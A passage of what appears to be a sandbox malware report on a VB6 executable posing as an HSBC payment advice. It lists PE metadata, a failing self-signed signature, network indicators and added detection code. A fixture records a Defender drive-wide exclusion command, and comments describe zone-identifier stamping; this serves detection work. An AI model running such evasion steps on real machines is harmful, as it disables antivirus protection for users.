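    "PSVersion: 5.1.17134.1",
    "**********************",
    "Command start time: 20211125185053",
    "**********************",
    "PS>Add-MpPreference -ExclusionPath C:\\",
])

ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites",
              3: "Internet", 4: "RestrictedSites"}
# Assumption: the Defender exclusion parameters worth alerting on.
EXCLUSION_PARAMS = ("-ExclusionPath", "-ExclusionProcess",
                    "-ExclusionExtension", "-ExclusionIpAddress")


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 at most."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def file_summary(data):
    return {"size": len(data), "entropy": shannon_entropy(data),
            "md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest()}


def parse_zone_identifier(stream):
    """Parse a Zone.Identifier alternate data stream (an INI [ZoneTransfer] section)."""
    fields, section = {}, None
    for line in stream.decode("utf-8", "replace").splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and section == "ZoneTransfer":
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    zone = int(fields.get("ZoneId", -1))
    # A downloaded file carries ZoneId=3 (Internet), which is what SmartScreen and the
    # Explorer/Office "this file came from the Internet" checks key on. A dropper that
    # stamps its copy with ZoneId=0 makes it look like it was created locally.
    return {"zone_id": zone, "zone": ZONE_NAMES.get(zone, "unknown"),
            "motw_neutralised": zone in (0, 1, 2), "fields": fields}


def defender_exclusions_in_transcript(text):
    """Return every Add-/Set-MpPreference exclusion recorded in a PowerShell transcript,
    with the process context taken from the transcript header."""
    text = text.replace("\r\n", "\n")
    pid = re.search(r"^Process ID:\s*(\d+)", text, re.M)
    host = re.search(r"^Host Application:\s*(.+)$", text, re.M)
    findings = []
    for m in re.finditer(r"^PS>(.*)$", text, re.M):
        cmd = m.group(1).strip()
        for param in EXCLUSION_PARAMS:
            hit = re.search(r"(?i)\b(Add|Set)-MpPreference\b.*" + re.escape(param) + r"\s+(\S+)", cmd)
            if not hit:
                continue
            value = hit.group(2).strip("\"'")
            findings.append({
                "pid": int(pid.group(1)) if pid else None,
                "host_application": host.group(1).strip() if host else None,
                "command": cmd, "parameter": param, "value": value,
                # Excluding a whole drive root blinds Defender to everything the
                # dropper will later write anywhere on that volume.
                "severity": "critical" if re.fullmatch(r"[A-Za-z]:\\?", value) else "high"})
    return findings
```

file_summary(ZONE_STREAM) reproduces the 26-byte size and the 3.9500637564 entropy the report lists for the stream, and file_summary(POLICY_PROBE) reproduces the hashes of the one-byte probe files, which is a quick way to confirm that the reconstruction matches what the sandbox saw. The transcript parser keys on the "PS>" command records rather than on "Host Application", so a one-liner passed on the command line and a command typed into an interactive session are caught the same way.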

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.9797505021512665
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:HSBC Payment Advice.exe
                  File size:111776
                  MD5:a069e61b357f625a7b3595150412c42d
                  SHA1:5fa560d04b13db7e0216bda2ca5f1c3b94a8912e
                  SHA256:0fb47a47bc025991b3ed8895aa84030def6e5cc538a9cec279a73f4528d549c6
                  SHA512:bf5c8d398a219e35048aa096c5c8f6a699edc8ffb63570aa8678f593da324421dfa19154a725e84f84af266320c90a88852328ef666826a750bdc992f4dff66f
                  SSDEEP:1536:d0a5ea6eyr8W6sWZrV64JPS8K8VZBeFR1JVk0A9p:d0Ja6e86smc4JhKmZBMR1JK0A9p
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...d...i.Rich..i.................PE..L...&..K.....................0....................@........................

                  File Icon

                  Icon Hash:20047c7c70f0e004

                  Static PE Info

                  General

                  Entrypoint:0x4011a8
                  Entrypoint Section:.text
                  Digitally signed:true
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x4BDCF126 [Sun May 2 03:27:34 2010 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:15f2ba1f2bb76fff74223ec60bc62d7d

                  Authenticode Signature

                  Signature Valid:false
                  Signature Issuer:E=Form_pneumatha@Form_Tavernenf2.Fo, CN=Form_Replansd, OU=Form_Variabel, O=Form_PSEUD, L=Form_specialt, S=Form_bispest, C=AQ
                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                  Error Number:-2146762487
                  Not Before, Not After
                  • 11/24/2021 11:04:33 AM 11/24/2022 11:04:33 AM
                  Subject Chain
                  • E=Form_pneumatha@Form_Tavernenf2.Fo, CN=Form_Replansd, OU=Form_Variabel, O=Form_PSEUD, L=Form_specialt, S=Form_bispest, C=AQ
                  Version:3
                  Thumbprint MD5:99DF32578053FC972FD1F244233579CA
                  Thumbprint SHA-1:11E3E91B7D7A2135B9E864D5EFEBD574FA821A18
                  Thumbprint SHA-256:2BED8134662C05F42BA8B6FE9C0873AA65E6A2AB13FFFFB2377591D7C09D20FE
                  Serial:00

                  Entrypoint Preview

Instruction (disassembly from the entrypoint 0x4011a8; only the first two instructions are code: the standard VB6 entry stub pushes the address of the VB project header and calls ThunRTMain in MSVBVM60.DLL, which runs the program and does not return. What follows the call is that header and its string data, not code, which is why the decoder produces the runs of add byte ptr [eax], al and the nonsense instructions below)
                  push 00401994h
                  call 00007F2B9497B253h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor byte ptr [eax], al
                  add byte ptr [eax], al
                  inc eax
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [3980A88Fh], dh
                  add byte ptr [ebp-0C4A53BCh], dh
                  mov dword ptr [edi-48h], ecx
                  mov word ptr [edx+00000000h], fs
                  add byte ptr [eax], al
                  add dword ptr [eax], eax
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  rcl ch, FFFFFFEEh
                  add al, byte ptr [esi+6Fh]
                  jc 00007F2B9497B2CFh
                  pop edi
                  inc esp
                  imul ebp, dword ptr [ebx+6Bh], 726F7265h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  dec esp
                  xor dword ptr [eax], eax
                  push es
                  stc
                  jnle 00007F2B9497B20Bh
                  in al, dx
                  sti
                  mov dl, 49h
                  dec ebx
                  mov esp, 17291D76h
                  sub eax, 7DD6CE7Ah
                  jle 00007F2B9497B257h
                  pop esp
                  mov dl, 2Ah
                  inc edx
                  mov edi, D0385669h
                  loop 00007F2B9497B259h
                  cmp cl, byte ptr [bx-53h]
                  xor ebx, dword ptr [ecx-48EE309Ah]
                  or al, 00h
                  stosb
                  add byte ptr [eax-2Dh], ah
                  xchg eax, ebx
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor al, byte ptr [ecx]
                  add byte ptr [eax], al
                  dec esi
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  or al, byte ptr [eax]
                  inc esi
                  outsd
                  jc 00007F2B9497B2CFh
                  pop edi
                  push eax
                  dec eax
                  pop ecx
                  dec esp
                  dec esp
                  add byte ptr [46000C01h], cl
                  outsd
                  jc 00007F2B9497B2CFh

                  Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18374 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1b000 | 0xa4e | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1a000 | 0x14a0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x220 | 0x20 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xa8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

                  Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x174d4 | 0x18000 | False | 0.475453694661 | data | 6.08617646952 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x19000 | 0x1c34 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x1b000 | 0xa4e | 0x1000 | False | 0.195068359375 | data | 2.1656784604 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
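The Authenticode block and the two tables above are what a header walk produces: the signature is present (Digitally signed: true) but its issuer is identical to its subject, i.e. self-signed, and the chain ends in an untrusted root, so it fails validation; the SECURITY directory has a size but no section, because its first field is a file offset rather than an RVA; and the IMPORT, IAT and RESOURCE entries map into .text and .rsrc. The following is an added example and not part of the report or of any tool the report uses. It builds a synthetic PE32 that reproduces the report's section, directory, timestamp and certificate-table numbers with zero filler (the bodies are not the sample's bytes), then parses it back, rebuilds the "Is in Section" column, reads the WIN_CERTIFICATE header, and hashes exactly the byte ranges an Authenticode signature covers, which is why editing the checksum or the certificate blob leaves the digest unchanged while editing a code byte does not.

```python
"""Walk a PE32 header the way the Static PE Info tables were produced: data
directories mapped to sections, the link timestamp, the WIN_CERTIFICATE table
behind "Digitally signed: true", and the byte ranges Authenticode actually
covers. Added example, stdlib only. build_sample_pe() reproduces the report's
layout numbers with zero filler; it is not the sample's content."""
import hashlib
import struct
from datetime import datetime, timezone

OPT_FMT = "<HBB6I3I6H4I2H4I2I"   # IMAGE_OPTIONAL_HEADER32 up to DataDirectory, 96 bytes
SEC_FMT = "<8sIIIIIIHHI"         # IMAGE_SECTION_HEADER, 40 bytes
DIR_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
             "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
             "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]


def parse_pe(data):
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    _, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    f = struct.unpack_from(OPT_FMT, data, opt)
    if f[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    dirs = {DIR_NAMES[i]: struct.unpack_from("<II", data, opt + 96 + 8 * i)
            for i in range(min(f[29], 16))}
    sections = []
    for i in range(nsec):
        name, vsize, va, raw, ptr, _, _, _, _, sc = struct.unpack_from(SEC_FMT, data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw": raw, "ptr": ptr, "chars": sc})
    return {"stamp": stamp, "chars": chars, "entry": f[6], "image_base": f[9],
            "size_of_headers": f[20], "opt_off": opt, "dirs": dirs, "sections": sections}


def section_for_rva(pe, rva):
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw"]):
            return s["name"]
    return None                      # in the headers or outside the image


def directory_sections(pe):
    """Rebuild the 'Is in Section' column. SECURITY holds a file offset, not an RVA;
    pushing it through the section table would wrongly land it in .data here."""
    return {name: None if size == 0 or name == "SECURITY" else section_for_rva(pe, rva)
            for name, (rva, size) in pe["dirs"].items()}


def compile_time(pe):
    return datetime.fromtimestamp(pe["stamp"], tz=timezone.utc).isoformat()


def certificate_table(data, pe):
    off, size = pe["dirs"]["SECURITY"]
    if size == 0:
        return None
    length, revision, cert_type = struct.unpack_from("<IHH", data, off)   # type 2 = PKCS#7 SignedData
    return {"length": length, "revision": revision, "type": cert_type, "blob": data[off + 8:off + length]}


def authenticode_digest(data, pe, algo="sha256"):
    """Digest the whole file minus CheckSum, the SECURITY directory entry and the cert table."""
    opt = pe["opt_off"]
    checksum_off, secdir_off, hdr_end = opt + 64, opt + 96 + 8 * 4, pe["size_of_headers"]
    h =  hashlib.new(algo)
    h.update(data[:checksum_off])
    h.update(data[checksum_off + 4:secdir_off])
    h.update(data[secdir_off + 8:hdr_end])
    covered = hdr_end
    for s in sorted(pe["sections"], key=lambda s: s["ptr"]):
        if s["raw"]:
            h.update(data[s["ptr"]:s["ptr"] + s["raw"]])
            covered += s["raw"]
    rest = bytearray(data[covered:])             # overlay data, minus the certificate table
    cert_off, cert_len = pe["dirs"]["SECURITY"]
    if cert_len and cert_off >= covered:
        del rest[cert_off - covered:cert_off - covered + cert_len]
    h.update(bytes(rest))
    return h.hexdigest()


def build_sample_pe():
    """Synthetic PE32 with the report's sections, directories, timestamp and a
    0x14a0-byte certificate table; every body is zero filler (constructed input)."""
    secs = [(b".text", 0x174D4, 0x1000, 0x18000, 0x1000, 0x60000020),
            (b".data", 0x1C34, 0x19000, 0, 0, 0xC0000040),
            (b".rsrc", 0xA4E, 0x1B000, 0x1000, 0x19000, 0x40000040)]
    dirs = [(0, 0)] * 16
    dirs[1], dirs[2], dirs[4] = (0x18374, 0x28), (0x1B000, 0xA4E), (0x1A000, 0x14A0)
    dirs[11], dirs[12] = (0x220, 0x20), (0x1000, 0xA8)
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0x4BDCF126, 0, 0, 224, 0x10F)
    opt = struct.pack(OPT_FMT, 0x10B, 6, 0, 0x18000, 0x1000, 0, 0x11A8, 0x1000, 0x19000,
                      0x400000, 0x1000, 0x1000, 4, 0, 4, 0, 4, 0, 0, 0x1C000, 0x1000, 0,
                      2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sec_hdrs = b"".join(struct.pack(SEC_FMT, n, vs, va, rs, rp, 0, 0, 0, 0, c) for n, vs, va, rs, rp, c in secs)
    headers = (dos + b"PE\0\0" + coff + opt + sec_hdrs).ljust(0x1000, b"\0")
    cert = struct.pack("<IHH", 0x14A0, 0x0200, 0x0002).ljust(0x14A0, b"\0")
    return headers + bytes(0x18000) + bytes(0x1000) + cert        # 111776 bytes, as reported
```

The synthetic file comes out at 111776 bytes, the report's file size, because 0x1000 of headers, 0x18000 of .text, 0x1000 of .rsrc and the 0x14a0-byte certificate table add up exactly; the same arithmetic is how you confirm on a real sample that nothing sits between the last section and the signature. authenticode_digest() computes the hash the PKCS#7 SignedData would have to carry; validating the signature itself needs a PKCS#7/X.509 parser, which is where the report's "terminated in a root certificate which is not trusted" verdict comes from.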

                  Resources

Name | RVA | Size | Type | Language | Country
VAV | 0x1b910 | 0x13e | MS Windows icon resource - 1 icon, 16x16, 16 colors | English | United States
RT_ICON | 0x1b7e0 | 0x130 | data | - | -
RT_ICON | 0x1b4f8 | 0x2e8 | data | - | -
RT_ICON | 0x1b3d0 | 0x128 | GLS_BINARY_LSB_FIRST | - | -
RT_GROUP_ICON | 0x1b3a0 | 0x30 | data | - | -
RT_VERSION | 0x1b1a0 | 0x200 | data | Chinese | Taiwan

                  Imports

DLL | Import
MSVBVM60.DLL | MethCallEngine, EVENT_SINK_AddRef, DllFunctionCall, EVENT_SINK_Release, EVENT_SINK_QueryInterface, __vbaExceptHandler

                  Version Infos

Description | Data
Translation | 0x0404 0x04b0
ProductVersion | 1.00
InternalName | Form_HALVGUDB
FileVersion | 1.00
OriginalFilename | Form_HALVGUDB.exe
ProductName | Form_Dikkeror6

                  Possible Origin

Language of compilation system | Country where language is spoken
English | United States
Chinese | Taiwan

                  Network Behavior

                  Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/25/21-18:53:02.752720 | UDP | 254 | DNS SPOOF query response with TTL of 1 min. and no authority | 53 | 60983 | 8.8.8.8 | 192.168.2.7

                  Network Port Distribution

                  TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2021 18:50:48.346342087 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:48.346391916 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:48.346503019 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:48.368999004 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:48.369026899 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:48.591464996 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:48.591680050 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:48.911839962 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:48.911871910 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:48.912266016 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:48.912343025 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:48.927681923 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:48.968868971 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.034470081 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.034513950 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.034595013 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.034611940 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.034662008 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.034742117 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.140517950 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.140626907 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.140726089 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.140752077 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.140801907 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.140887022 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.246818066 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.246903896 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.247037888 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.247054100 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.247077942 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.247140884 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.247150898 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.247180939 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.247287035 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.247297049 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.247386932 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.247488022 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.247560978 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.247606039 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.247617960 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.247683048 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.247750044 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.247849941 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.353219032 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.353311062 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.353380919 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.353388071 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.353406906 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.353437901 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.353461027 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.353508949 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.353514910 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.353533983 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:50:49.353563070 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.353602886 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.354094982 CET | 49784 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:50:49.354118109 CET | 443 | 49784 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:00.460516930 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:00.460582018 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:00.460683107 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:00.464102030 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:00.464138985 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:00.681277990 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:00.681387901 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:00.689795017 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:00.689815044 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:00.690073013 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:00.690130949 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:00.691816092 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:00.732903004 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:00.893867016 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:00.893901110 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:00.894057035 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:00.894085884 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:00.894145966 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.000435114 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.000508070 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.000624895 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.000644922 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.000710964 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.000756025 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.107126951 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.107188940 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.107249975 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.107270002 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.107323885 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.107702971 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.107767105 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.107800961 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.107810020 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.107836962 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.107846022 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.107904911 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.107969999 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.108017921 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.108079910 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.148771048 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.148972988 CET | 49823 | 443 | 192.168.2.7 | 38.103.244.107
Nov 25, 2021 18:53:01.213685036 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7
Nov 25, 2021 18:53:01.213769913 CET | 443 | 49823 | 38.103.244.107 | 192.168.2.7

                  UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2021 18:50:48.214104891 CET | 52816 | 53 | 192.168.2.7 | 8.8.8.8
Nov 25, 2021 18:50:48.326981068 CET | 53 | 52816 | 8.8.8.8 | 192.168.2.7
Nov 25, 2021 18:53:00.343080044 CET | 58820 | 53 | 192.168.2.7 | 8.8.8.8
Nov 25, 2021 18:53:00.455828905 CET | 53 | 58820 | 8.8.8.8 | 192.168.2.7
Nov 25, 2021 18:53:02.707252979 CET | 60983 | 53 | 192.168.2.7 | 8.8.8.8
Nov 25, 2021 18:53:02.752720118 CET | 53 | 60983 | 8.8.8.8 | 192.168.2.7

                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 25, 2021 18:50:48.214104891 CET | 192.168.2.7 | 8.8.8.8 | 0x4373 | Standard query (0) | spuredge.com | A (IP address) | IN (0x0001)
Nov 25, 2021 18:53:00.343080044 CET | 192.168.2.7 | 8.8.8.8 | 0x8081 | Standard query (0) | spuredge.com | A (IP address) | IN (0x0001)
Nov 25, 2021 18:53:02.707252979 CET | 192.168.2.7 | 8.8.8.8 | 0x13e6 | Standard query (0) | barr2.ddns.net | A (IP address) | IN (0x0001)

                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 25, 2021 18:50:48.326981068 CET | 8.8.8.8 | 192.168.2.7 | 0x4373 | No error (0) | spuredge.com | - | 38.103.244.107 | A (IP address) | IN (0x0001)
Nov 25, 2021 18:53:00.455828905 CET | 8.8.8.8 | 192.168.2.7 | 0x8081 | No error (0) | spuredge.com | - | 38.103.244.107 | A (IP address) | IN (0x0001)
